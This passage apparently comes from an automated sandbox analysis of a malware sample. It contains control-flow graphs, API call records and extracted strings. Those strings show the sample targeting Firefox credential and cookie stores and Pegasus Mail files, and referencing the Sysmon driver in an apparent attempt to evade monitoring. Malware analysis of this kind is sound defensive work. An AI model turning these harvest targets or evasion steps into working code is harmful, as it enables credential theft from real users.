                                                          • lstrcatW.KERNEL32(?,?), ref: 00406423
                                                          • lstrcatW.KERNEL32(?,?), ref: 0040692A
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 00406934
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: Ku^%$Ku^%$Y=`$Y=`
                                                          • API String ID: 4038537762-3617128223
                                                          • Opcode ID: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                          • Instruction ID: 9c9fa2152e9cc94146e123e662ad7e189f6101f2fbba187f29f17e96b34d8480
                                                          • Opcode Fuzzy Hash: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                          • Instruction Fuzzy Hash: 72F11AB1D0010A9BCF249E9898815BE7A70AB54304F264D3BE517FA3E4D37CCD619B5B

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5517 42b9c5-42b9ce 5518 42b9d5-42b9dd 5517->5518 5519 42ba34-42ba39 5518->5519 5520 42b9df-42b9e4 5518->5520 5523 42bb28-42bb2d 5519->5523 5524 42ba3f-42ba44 5519->5524 5521 42bad0-42bad5 5520->5521 5522 42b9ea-42b9ef 5520->5522 5529 42badb-42bae0 5521->5529 5530 42bbcf-42bbd4 5521->5530 5527 42b9f5-42b9fa 5522->5527 5528 42bb59-42bb5e 5522->5528 5525 42bb33-42bb38 5523->5525 5526 42bc20-42bc25 5523->5526 5531 42ba4a-42ba4f 5524->5531 5532 42bb9c-42bba1 5524->5532 5533 42bb3e-42bb43 5525->5533 5534 42bd0d-42bd12 5525->5534 5537 42bc2b-42bc30 5526->5537 5538 42bdff-42be04 5526->5538 5535 42ba00-42ba05 5527->5535 5536 42bc6c-42bc71 5527->5536 5539 42bd40-42bd45 5528->5539 5540 42bb64-42bb69 5528->5540 5541 42bae6-42baeb 5529->5541 5542 42bcdd-42bce2 5529->5542 5547 42bdba-42bdbf 5530->5547 5548 42bbda-42bbdf 5530->5548 5545 42ba55-42ba5a 5531->5545 5546 42bcab-42bcb0 5531->5546 5543 42bba7-42bbac 5532->5543 5544 42bd6e-42bd73 5532->5544 5561 42bed5-42bef9 5533->5561 5562 42bb49-42bb4e 5533->5562 5567 42bd18-42bd1d 5534->5567 5568 42bfed-42c009 5534->5568 5565 42be21-42be81 call 40e14e * 4 5535->5565 5566 42ba0b-42ba10 5535->5566 5555 42bf87-42bfa6 call 42ca0d 5536->5555 5556 42bc77-42bc7c 5536->5556 5551 42bc36-42bc3b 5537->5551 5552 42bf6c-42bf77 5537->5552 5553 42be0a-42be0f 5538->5553 5554 42c08d-42c0b0 5538->5554 5571 42bd4b-42bd50 5539->5571 5572 42c018-42c027 5539->5572 5569 42bf09-42bf29 5540->5569 5570 42bb6f-42bb74 5540->5570 5557 42baf1-42baf6 5541->5557 5558 42be9f-42bec5 call 42ad82 5541->5558 5563 42bfd2-42bfe8 5542->5563 5564 42bce8-42bced 5542->5564 5573 42bbb2-42bbb7 5543->5573 5574 42bf39-42bf5c 5543->5574 5575 42bd79-42bd7e 5544->5575 5576 42c02c-42c033 5544->5576 5577 42ba60-42ba65 5545->5577 5578 42be86-42be8f 5545->5578 5559 42bcb6-42bcbb 5546->5559 5560 42bfab-42bfcd call 42b9c5 5546->5560 5549 42bdc5-42bdca 5547->5549 5550 42c038-42c043 5547->5550 5579 42bbe5-42bbea 5548->5579 5580 42c05e-42c084 5548->5580 5549->5518 5601 42bdd0-42bdef call 42b9ae 5549->5601 5588 42c045-42c04d 5550->5588 5589 42c04f 5550->5589 5551->5518 5585 42bc41-42bc61 5551->5585 5581 42c010-42c013 5552->5581 5582 42bf7d-42bf82 5552->5582 5553->5518 5602 42be15-42be1c 5553->5602 5592 42c0b7-42c0ba 5554->5592 5593 42c0b2 5554->5593 5555->5518 5556->5518 5587 42bc82-42bca6 call 42b9c5 5556->5587 5557->5518 5603 42bafc-42bb11 call 40b7bb 5557->5603 5558->5581 5638 42becb-42bed0 5558->5638 5559->5518 5590 42bcc1-42bcd8 call 447e24 5559->5590 5560->5518 5561->5581 5609 42beff-42bf04 5561->5609 5562->5589 5605 42bb54 5562->5605 5563->5518 5564->5518 5594 42bcf3-42bd08 5564->5594 5565->5518 5595 42ba16-42ba32 call 438e28 5566->5595 5596 42c0bf-42c0c4 5566->5596 5567->5518 5597 42bd23-42bd3b 5567->5597 5568->5581 5586 42c00b 5568->5586 5569->5581 5611 42bf2f-42bf34 5569->5611 5570->5518 5608 42bb7a-42bb97 5570->5608 5571->5518 5598 42bd56-42bd69 5571->5598 5572->5518 5573->5518 5610 42bbbd-42bbca 5573->5610 5574->5581 5612 42bf62-42bf67 5574->5612 5575->5518 5599 42bd84-42bdaf call 42b9c5 5575->5599 5576->5518 5577->5518 5600 42ba6b-42bacb call 40e14e * 4 5577->5600 5578->5581 5606 42be95-42be9a 5578->5606 5579->5518 5613 42bbf0-42bc15 call 42ca0d 5579->5613 5591 42c086-42c08b 5580->5591 5580->5592 5581->5518 5582->5581 5585->5612 5617 42bc67 5585->5617 5586->5581 5587->5518 5588->5580 5588->5589 5619 42c050 5589->5619 5590->5518 5591->5592 5592->5518 5593->5592 5594->5518 5595->5518 5596->5518 5622 42c0ca-42c0d9 call 447a80 5596->5622 5597->5518 5598->5518 5599->5612 5641 42bdb5 5599->5641 5600->5518 5601->5581 5643 42bdf5-42bdfa 5601->5643 5602->5518 5647 42bb16-42bb23 5603->5647 5605->5518 5606->5581 5608->5518 5609->5581 5610->5518 5611->5581 5612->5581 5613->5611 5639 42bc1b 5613->5639 5617->5581 5619->5619 5638->5581 5639->5581 5641->5581 5643->5581 5647->5518
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *.CNM$*.PM$*.PMF$*.PML$*.PMN$*.USR$*.WPM$*CACHE.PM$C:\PMAIL$Ku^%$Ku^%$Mail Clients\Pegasus$kernel32.dll
                                                          • API String ID: 0-3904125897
                                                          • Opcode ID: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                          • Instruction ID: 84dac617f37148c4bf89ffca1ba6cb6ddcd73cd34940f6261eccf690c7d83b59
                                                          • Opcode Fuzzy Hash: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                          • Instruction Fuzzy Hash: E0E10BB1F0012A8BCF249E99A88167F7B74EB05354FA4052BE511EB361E77C8D409BDB

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5656 40a928-40a970 call 447047 call 438e28 5662 40a973-40a97b 5656->5662 5663 40a9f5-40a9fa 5662->5663 5664 40a97d-40a982 5662->5664 5665 40aa00-40aa05 5663->5665 5666 40aa93-40aa98 5663->5666 5667 40aa43-40aa48 5664->5667 5668 40a988-40a98d 5664->5668 5673 40aa0b-40aa10 5665->5673 5674 40ab4c-40ab51 5665->5674 5671 40abb7-40abbc 5666->5671 5672 40aa9e-40aaa3 5666->5672 5675 40ab86-40ab8b 5667->5675 5676 40aa4e-40aa53 5667->5676 5669 40a993-40a998 5668->5669 5670 40aaee-40aaf3 5668->5670 5677 40abfe-40ac03 5669->5677 5678 40a99e-40a9a3 5669->5678 5687 40aca4-40aca9 5670->5687 5688 40aaf9-40aafe 5670->5688 5689 40ad42-40ad47 5671->5689 5690 40abc2-40abc7 5671->5690 5681 40ac73-40ac78 5672->5681 5682 40aaa9-40aaae 5672->5682 5685 40ac20-40ac25 5673->5685 5686 40aa16-40aa1b 5673->5686 5679 40acd4-40acd9 5674->5679 5680 40ab57-40ab5c 5674->5680 5683 40ab91-40ab96 5675->5683 5684 40ad0b-40ad10 5675->5684 5691 40aa59-40aa5e 5676->5691 5692 40ac3b-40ac40 5676->5692 5711 40b010-40b029 call 447047 5677->5711 5712 40ac09-40ac0e 5677->5712 5693 40ad73-40ad84 5678->5693 5694 40a9a9-40a9ae 5678->5694 5695 40ae4c-40ae4f 5679->5695 5696 40acdf-40ace4 5679->5696 5697 40ab62-40ab67 5680->5697 5698 40af0a-40af24 5680->5698 5719 40b084-40b0ae call 438e28 5681->5719 5720 40ac7e-40ac83 5681->5720 5715 40ae90-40aea2 call 40a928 5682->5715 5716 40aab4-40aab9 5682->5716 5701 40ab9c-40aba1 5683->5701 5702 40af4e-40af66 5683->5702 5699 40ad16-40ad1b 5684->5699 5700 40b0bf-40b0e2 5684->5700 5713 40ac2b-40ac30 5685->5713 5714 40b02e-40b050 lstrcatW lstrlenW 5685->5714 5703 40aa21-40aa26 5686->5703 5704 40adcf-40ae09 call 40b81c call 40a928 5686->5704 5723 40b0b3-40b0ba 5687->5723 5724 40acaf-40acb4 5687->5724 5721 40aeb1-40aee5 5688->5721 5722 40ab04-40ab09 5688->5722 5705 40b0f1-40b101 5689->5705 5706 40ad4d-40ad52 5689->5706 5707 40afb5-40afd9 5690->5707 5708 40abcd-40abd2 5690->5708 5709 40aa64-40aa69 5691->5709 5710 40ae1a-40ae25 5691->5710 5717 40b055-40b075 5692->5717 5718 40ac46-40ac4b 5692->5718 5738 40b009-40b00e 5693->5738 5739 40ad8a 5693->5739 5728 40a9b4-40a9b9 5694->5728 5729 40ad8f-40adbf call 40b129 call 40b7bb 5694->5729 5748 40ae50 5695->5748 5696->5662 5730 40acea-40acfb 5696->5730 5749 40af33-40af49 call 447047 5697->5749 5750 40ab6d-40ab72 5697->5750 5755 40af26 5698->5755 5756 40af2b-40af2e 5698->5756 5699->5662 5732 40ad21-40ad32 5699->5732 5733 40b0e4 5700->5733 5734 40b0e9-40b0ec 5700->5734 5752 40aba7-40abac 5701->5752 5753 40af6b-40af9c NtCreateFile call 438e28 5701->5753 5702->5662 5735 40aa2c-40aa31 5703->5735 5736 40ae0e-40ae15 5703->5736 5704->5662 5705->5662 5706->5662 5737 40ad58-40ad6e call 447047 5706->5737 5707->5662 5757 40abd8-40abdd 5708->5757 5758 40afde-40b007 call 40a928 call 40b129 5708->5758 5740 40ae6d-40ae8b 5709->5740 5741 40aa6f-40aa74 5709->5741 5710->5695 5745 40ae27-40ae2f 5710->5745 5711->5662 5759 40ac14-40ac1b 5712->5759 5760 40b106-40b10b 5712->5760 5761 40ae61-40ae68 5713->5761 5762 40ac36 5713->5762 5714->5662 5743 40aea5-40aeac 5715->5743 5716->5743 5744 40aabf-40aac4 5716->5744 5726 40b077 5717->5726 5727 40b07c-40b07f 5717->5727 5718->5662 5763 40ac51-40ac6e lstrlenW 5718->5763 5719->5662 5720->5662 5764 40ac89-40ac9f call 447047 5720->5764 5721->5734 5754 40aeeb-40aef0 5721->5754 5746 40aef5-40af05 5722->5746 5747 40ab0f-40ab14 5722->5747 5723->5662 5724->5662 5725 40acba-40accf lstrcatW 5724->5725 5725->5662 5726->5727 5727->5662 5728->5662 5766 40a9bb-40a9e5 5728->5766 5729->5727 5808 40adc5-40adca 5729->5808 5730->5727 5767 40ad01-40ad06 5730->5767 5732->5727 5769 40ad38-40ad3d 5732->5769 5733->5734 5734->5662 5735->5662 5770 40aa37-40aa3e 5735->5770 5736->5662 5737->5662 5738->5727 5739->5727 5740->5662 5741->5662 5774 40aa7a-40aa8e 5741->5774 5743->5662 5744->5662 5776 40aaca-40aade 5744->5776 5745->5761 5777 40ae31-40ae47 5745->5777 5746->5662 5747->5662 5778 40ab1a-40ab3c 5747->5778 5748->5748 5749->5662 5750->5662 5779 40ab78-40ab81 5750->5779 5752->5777 5781 40abb2 5752->5781 5798 40afa1-40afb0 5753->5798 5754->5734 5755->5756 5756->5727 5757->5662 5783 40abe3-40abee 5757->5783 5758->5727 5758->5738 5759->5662 5760->5662 5772 40b111-40b118 5760->5772 5761->5662 5762->5662 5763->5662 5764->5662 5766->5727 5788 40a9eb-40a9f0 5766->5788 5767->5727 5769->5727 5770->5662 5790 40b11a-40b11c 5772->5790 5791 40b11e 5772->5791 5774->5662 5776->5727 5794 40aae4-40aae9 5776->5794 5777->5662 5778->5727 5795 40ab42-40ab47 5778->5795 5779->5743 5781->5662 5783->5727 5797 40abf4-40abf9 5783->5797 5788->5727 5801 40b121-40b128 5790->5801 5791->5801 5794->5727 5795->5727 5797->5727 5798->5662 5808->5727
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,75920880,?,0040B7CA,0040C9F4,?,?,?), ref: 0040AC5E
                                                          • lstrcatW.KERNEL32(?,\??\,?,?,?,?,?,?,?,?,75920880,?,0040B7CA,0040C9F4,?,?), ref: 0040ACC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcatlstrlen
                                                          • String ID: \??\$kernel32.dll$ntdll.dll
                                                          • API String ID: 1475610065-320376045
                                                          • Opcode ID: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                          • Instruction ID: cf05d70ef52a95d5e776fd44e962e356ae6502797ff445894325f4a97f5a2809
                                                          • Opcode Fuzzy Hash: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                          • Instruction Fuzzy Hash: E302C5B1E443198ADF288A58C842ABFB670EB14310F25493BE515FB3E0D3798D519B9F

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5961 42fd35-42fd3e 5962 42fd45-42fd4d 5961->5962 5963 42fdb5-42fdba 5962->5963 5964 42fd4f-42fd54 5962->5964 5965 42fe70-42fe75 5963->5965 5966 42fdc0-42fdc5 5963->5966 5967 42fe25-42fe2a 5964->5967 5968 42fd5a-42fd5f 5964->5968 5971 42ff83-42ff88 5965->5971 5972 42fe7b-42fe80 5965->5972 5973 42ff0a-42ff0f 5966->5973 5974 42fdcb-42fdd0 5966->5974 5969 42ff30-42ff35 5967->5969 5970 42fe30-42fe35 5967->5970 5975 42fec5-42feca 5968->5975 5976 42fd65-42fd6a 5968->5976 5983 430195-4301b6 5969->5983 5984 42ff3b-42ff40 5969->5984 5979 430051-430075 call 42f278 5970->5979 5980 42fe3b-42fe40 5970->5980 5989 4301bf-4301d6 5971->5989 5990 42ff8e-42ff93 5971->5990 5985 42fe86-42fe8b 5972->5985 5986 430095-4300a0 5972->5986 5981 430130-43016d call 42fd35 call 430228 5973->5981 5982 42ff15-42ff1a 5973->5982 5987 42fdd6-42fddb 5974->5987 5988 430004-43002c call 42f278 5974->5988 5991 42fed0-42fed5 5975->5991 5992 4300e4-4300ef 5975->5992 5977 42fd70-42fd75 5976->5977 5978 42ffcc-42ffd3 5976->5978 6005 42fd7b-42fd80 5977->6005 6006 42ffd8-42fff9 call 42f278 5977->6006 5978->5962 5979->5962 5995 42fe46-42fe4b 5980->5995 5996 43007a-430090 5980->5996 5994 4301dd-4301e0 5981->5994 6045 43016f-430174 5981->6045 6009 42ff20-42ff25 5982->6009 6010 430176-43018c 5982->6010 5993 4301b8-4301bd 5983->5993 5983->5994 6012 42ff46-42ff78 call 42f278 5984->6012 6013 4301e5-4301ea 5984->6013 5999 4300b0-4300d4 5985->5999 6000 42fe91-42fe96 5985->6000 5986->5994 6004 4300a6-4300ab 5986->6004 6014 42fde1-42fde6 5987->6014 6015 430037-43004c 5987->6015 6032 43018e-430193 5988->6032 6036 430032 5988->6036 5989->5994 5997 4301d8 5989->5997 5990->5962 6016 42ff99-42ffbc 5990->6016 6002 43010a-43012b 5991->6002 6003 42fedb-42fee0 5991->6003 6007 4300f1-4300f9 5992->6007 6008 4300fb 5992->6008 5993->5994 5994->5962 5995->5962 6018 42fe51-42fe5c call 42f625 5995->6018 5996->5962 5997->5994 5999->5994 6025 4300da-4300df 5999->6025 6000->5962 6022 42fe9c-42fec0 call 42fd35 6000->6022 6002->5962 6003->5962 6024 42fee6-42ff05 call 42f278 6003->6024 6004->5994 6005->5962 6026 42fd82-42fd9e call 42f625 * 2 6005->6026 6006->6045 6046 42ffff 6006->6046 6007->6002 6007->6008 6027 4300fc 6008->6027 6009->6008 6028 42ff2b 6009->6028 6010->5994 6010->6032 6012->6004 6052 42ff7e 6012->6052 6013->5962 6020 4301f0-43021b call 42f625 * 3 6013->6020 6014->5962 6031 42fdec-42fe16 6014->6031 6015->5962 6016->5994 6017 42ffc2-42ffc7 6016->6017 6017->5994 6044 42fe61-42fe6b 6018->6044 6058 430220-430227 6020->6058 6022->5962 6024->5962 6025->5994 6056 42fda3-42fdb3 6026->6056 6027->6027 6028->5962 6042 42fe18 6031->6042 6043 42fe1d-42fe20 6031->6043 6032->5994 6036->5994 6042->6043 6043->5962 6044->5962 6045->5994 6046->5994 6052->5994 6056->5962
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$cert9.db$cookies.sqlite$formhistory.sqlite$key4.db$logins.json$places.sqlite
                                                          • API String ID: 4038537762-2469458786
                                                          • Opcode ID: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                          • Instruction ID: d1eb3a7c9248dbe3af820f863548cf4fb9ed3ca77677979f9304c8b24649e330
                                                          • Opcode Fuzzy Hash: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                          • Instruction Fuzzy Hash: 9FB128B1E1012A97CF288E58A95567F7674AB45300FE4163BE816FB390E73DCA05878B

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6194 4262a1-4262b8 6195 4262bc-4262c4 6194->6195 6196 4262c6-4262cb 6195->6196 6197 426335-42633a 6195->6197 6200 4262d1-4262d6 6196->6200 6201 42638a-42638f 6196->6201 6198 426340-426345 6197->6198 6199 4263f4-4263f9 6197->6199 6204 4264a5-4264aa 6198->6204 6205 42634b-426350 6198->6205 6202 426529-42652e 6199->6202 6203 4263ff-426404 6199->6203 6206 426448-42644d 6200->6206 6207 4262dc-4262e1 6200->6207 6208 4264e3-4264e8 6201->6208 6209 426395-42639a 6201->6209 6210 426534-426539 6202->6210 6211 4266ed-4266f2 6202->6211 6212 426616-42661b 6203->6212 6213 42640a-42640f 6203->6213 6214 4264b0-4264b5 6204->6214 6215 426675-42667a 6204->6215 6216 426356-42635b 6205->6216 6217 4265a4-4265a9 6205->6217 6222 426453-426458 6206->6222 6223 426648-42664d 6206->6223 6218 426582-426587 6207->6218 6219 4262e7-4262ec 6207->6219 6220 4266bb-4266c0 6208->6220 6221 4264ee-4264f3 6208->6221 6224 4263a0-4263a5 6209->6224 6225 4265ea-4265ef 6209->6225 6228 4268c6-4268de 6210->6228 6229 42653f-426544 6210->6229 6234 4266f8-4266fd 6211->6234 6235 4269ae-4269cc call 4279e0 6211->6235 6246 426621-426626 6212->6246 6247 426914-426939 6212->6247 6232 4267d4-4267f3 call 422817 6213->6232 6233 426415-42641a 6213->6233 6248 426847-426862 RtlAdjustPrivilege call 4279e0 6214->6248 6249 4264bb-4264c0 6214->6249 6254 426680-426685 6215->6254 6255 42695e-42696d 6215->6255 6250 426361-426366 6216->6250 6251 4265de-4265e5 6216->6251 6238 4265af-4265b4 6217->6238 6239 4268fc-426903 6217->6239 6236 4268e3-4268f7 6218->6236 6237 42658d-426592 6218->6237 6240 4262f2-4262f7 6219->6240 6241 42670f-426719 6219->6241 6230 426972-42699f call 424c44 call 422177 6220->6230 6231 4266c6-4266cb 6220->6231 6256 4268a4-4268ab 6221->6256 6257 4264f9-4264fe 6221->6257 6242 426824-426836 6222->6242 6243 42645e-426463 6222->6243 6252 426942-426959 6223->6252 6253 426653-426658 6223->6253 6226 42676a-426791 6224->6226 6227 4263ab-4263b0 6224->6227 6244 4265f5-4265fa 6225->6244 6245 426908-42690f 6225->6245 6264 4269a6-4269a9 6226->6264 6266 426797-42679c 6226->6266 6258 4267a1-4267c4 6227->6258 6259 4263b6-4263bb 6227->6259 6228->6195 6275 4269d1-4269d6 6229->6275 6276 42654a-426572 call 424995 6229->6276 6230->6264 6329 4269a1 6230->6329 6231->6195 6260 4266d1-4266e8 6231->6260 6232->6264 6311 4267f9-4267fe 6232->6311 6261 426803-42681f 6233->6261 6262 426420-426425 6233->6262 6234->6195 6263 426703-42670a 6234->6263 6235->6195 6236->6195 6237->6195 6279 426598-42659f 6237->6279 6238->6195 6280 4265ba-4265d9 call 426a09 6238->6280 6239->6195 6281 426729-42673a 6240->6281 6282 4262fd-426302 6240->6282 6241->6264 6265 42671f-426724 6241->6265 6242->6195 6267 42683b-426842 6243->6267 6268 426469-42646e 6243->6268 6244->6195 6284 426600-426611 GetPEB 6244->6284 6245->6195 6246->6195 6285 42662c-426643 call 43f000 6246->6285 6247->6264 6277 42693b-426940 6247->6277 6297 426867-426872 6248->6297 6270 4264c6-4264cb 6249->6270 6271 426877-426894 6249->6271 6286 42673f-42675a 6250->6286 6287 42636c-426371 6250->6287 6251->6195 6252->6195 6253->6195 6288 42665e-426670 6253->6288 6254->6195 6289 42668b-4266ab call 426a42 call 41eba8 6254->6289 6255->6195 6256->6195 6273 4268b0-4268c1 6257->6273 6274 426504-426509 6257->6274 6258->6264 6293 4267ca-4267cf 6258->6293 6259->6195 6290 4263c1-4263ef LoadLibraryA 6259->6290 6260->6195 6261->6195 6262->6195 6291 42642b-426443 call 41eba8 call 41f9a4 6262->6291 6263->6195 6264->6195 6265->6264 6266->6264 6267->6195 6268->6195 6294 426474-426495 call 41eb3f 6268->6294 6270->6195 6296 4264d1-4264de call 422817 6270->6296 6271->6264 6298 42689a-42689f 6271->6298 6273->6195 6274->6195 6299 42650f-426524 6274->6299 6275->6195 6305 4269dc-4269e3 6275->6305 6276->6264 6322 426578-42657d 6276->6322 6277->6264 6279->6195 6280->6251 6281->6195 6282->6195 6303 426304-42632a call 422817 call 4244e4 6282->6303 6284->6195 6285->6195 6286->6264 6292 426760-426765 6286->6292 6287->6195 6307 426377-42637b 6287->6307 6288->6195 6289->6264 6331 4266b1-4266b6 6289->6331 6290->6195 6291->6279 6292->6264 6293->6264 6294->6264 6328 42649b-4264a0 6294->6328 6296->6263 6297->6195 6298->6264 6299->6195 6303->6298 6334 426330 6303->6334 6325 42637e-426385 6307->6325 6311->6264 6322->6264 6325->6195 6328->6264 6329->6264 6331->6264 6334->6264
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: A8r$SysmonDrv$dll$fltl$ib.d
                                                          • API String ID: 1029625771-1616023887
                                                          • Opcode ID: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                          • Instruction ID: eb42a9731a47ced65949ee17454b9c50096d91694aa44b165600d0182d074a5f
                                                          • Opcode Fuzzy Hash: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                          • Instruction Fuzzy Hash: E7E1D5B1709220DBCB24AB18E68572E76E5EB80304FA65D1FF485CB350D63DC9829B5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M0@$UL6T$VL6T
                                                          • API String ID: 0-769956738
                                                          • Opcode ID: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                          • Instruction ID: 5b652a97159c1cfdc4854cd4c98ad9d0b798284c57e6c6df073e9b00d242a01e
                                                          • Opcode Fuzzy Hash: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                          • Instruction Fuzzy Hash: 0032A871D1051B8BCF289A98878D57EB6B0AB54350B24063BE915FB3D0D3BCCE419B9B

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6768 40b129-40b139 6769 40b13c-40b144 6768->6769 6770 40b146-40b14b 6769->6770 6771 40b17e-40b183 6769->6771 6772 40b1b7-40b1bc 6770->6772 6773 40b14d-40b152 6770->6773 6774 40b215-40b21a 6771->6774 6775 40b189-40b18e 6771->6775 6782 40b1c2-40b1c7 6772->6782 6783 40b32c-40b331 6772->6783 6776 40b2a5-40b2aa 6773->6776 6777 40b158-40b15d 6773->6777 6778 40b220-40b225 6774->6778 6779 40b359-40b35e 6774->6779 6780 40b194-40b199 6775->6780 6781 40b2db-40b2e0 6775->6781 6798 40b2b0-40b2b5 6776->6798 6799 40b584-40b5a7 call 40a928 6776->6799 6784 40b163-40b168 6777->6784 6785 40b3c8-40b3cd 6777->6785 6788 40b4a9-40b4c2 6778->6788 6789 40b22b-40b230 6778->6789 6794 40b360-40b365 6779->6794 6795 40b395-40b3b8 6779->6795 6790 40b40f-40b414 6780->6790 6791 40b19f-40b1a4 6780->6791 6786 40b601-40b607 call 40a928 6781->6786 6787 40b2e6-40b2eb 6781->6787 6796 40b4c7-40b4cc 6782->6796 6797 40b1cd-40b1d2 6782->6797 6792 40b646-40b65b 6783->6792 6793 40b337-40b33c 6783->6793 6813 40b503-40b532 6784->6813 6814 40b16e-40b173 6784->6814 6803 40b6d3-40b6fc 6785->6803 6804 40b3d3-40b3d8 6785->6804 6844 40b60c-40b616 6786->6844 6815 40b2f1-40b2f6 6787->6815 6816 40b61b-40b641 call 438e28 6787->6816 6788->6769 6805 40b236-40b23b 6789->6805 6806 40b569-40b574 6789->6806 6808 40b710-40b73f call 40b129 6790->6808 6809 40b41a-40b41f 6790->6809 6819 40b541-40b55e 6791->6819 6820 40b1aa-40b1af 6791->6820 6801 40b746-40b749 6792->6801 6810 40b661-40b666 6792->6810 6821 40b342-40b347 6793->6821 6822 40b66b-40b6a6 call 40b81c call 40a928 6793->6822 6823 40b6ab-40b6ca 6794->6823 6824 40b36b-40b370 6794->6824 6795->6801 6802 40b3be-40b3c3 6795->6802 6817 40b4d2-40b4f3 6796->6817 6818 40b74e-40b753 6796->6818 6825 40b494-40b497 6797->6825 6826 40b1d8-40b1dd 6797->6826 6811 40b5b2-40b5f1 call 40b81c call 40b7bb 6798->6811 6812 40b2bb-40b2c0 6798->6812 6799->6810 6860 40b5ad 6799->6860 6801->6769 6802->6801 6850 40b703-40b70b call 40b81c 6803->6850 6851 40b6fe 6803->6851 6804->6769 6828 40b3de-40b404 call 40b129 6804->6828 6805->6769 6843 40b241-40b295 call 40b129 call 40b81c 6805->6843 6806->6801 6839 40b57a-40b57f 6806->6839 6808->6801 6837 40b741 6808->6837 6809->6769 6829 40b425-40b470 call 438e28 call 447e24 6809->6829 6810->6801 6811->6801 6883 40b5f7-40b5fc 6811->6883 6812->6769 6846 40b2c6-40b2cc 6812->6846 6833 40b534 6813->6833 6834 40b539-40b53c 6813->6834 6814->6769 6831 40b175-40b17c 6814->6831 6815->6769 6848 40b2fc-40b321 6815->6848 6816->6769 6817->6801 6832 40b4f9-40b4fe 6817->6832 6818->6769 6827 40b759-40b7ba NtReadFile call 438e28 NtClose 6818->6827 6819->6837 6838 40b564 6819->6838 6835 40b1b5 6820->6835 6836 40b2cf-40b2d6 6820->6836 6821->6769 6852 40b34d-40b354 6821->6852 6822->6769 6823->6801 6849 40b6cc-40b6d1 6823->6849 6824->6769 6854 40b376-40b381 6824->6854 6830 40b498 6825->6830 6826->6769 6840 40b1e3-40b210 call 447047 call 447e24 6826->6840 6828->6837 6876 40b40a 6828->6876 6887 40b475-40b48f 6829->6887 6830->6830 6831->6769 6832->6801 6833->6834 6834->6769 6835->6769 6836->6769 6837->6801 6838->6801 6839->6801 6840->6769 6843->6801 6886 40b29b-40b2a0 6843->6886 6844->6769 6846->6836 6848->6810 6865 40b327 6848->6865 6849->6801 6850->6769 6851->6850 6852->6769 6854->6825 6855 40b387-40b38f 6854->6855 6855->6788 6855->6795 6860->6801 6865->6801 6876->6801 6883->6801 6886->6801 6887->6769
                                                          APIs
                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,7595F770,7595F770), ref: 0040B792
                                                          • NtClose.NTDLL ref: 0040B7B1
                                                          Strings
                                                          Memory Dump Source
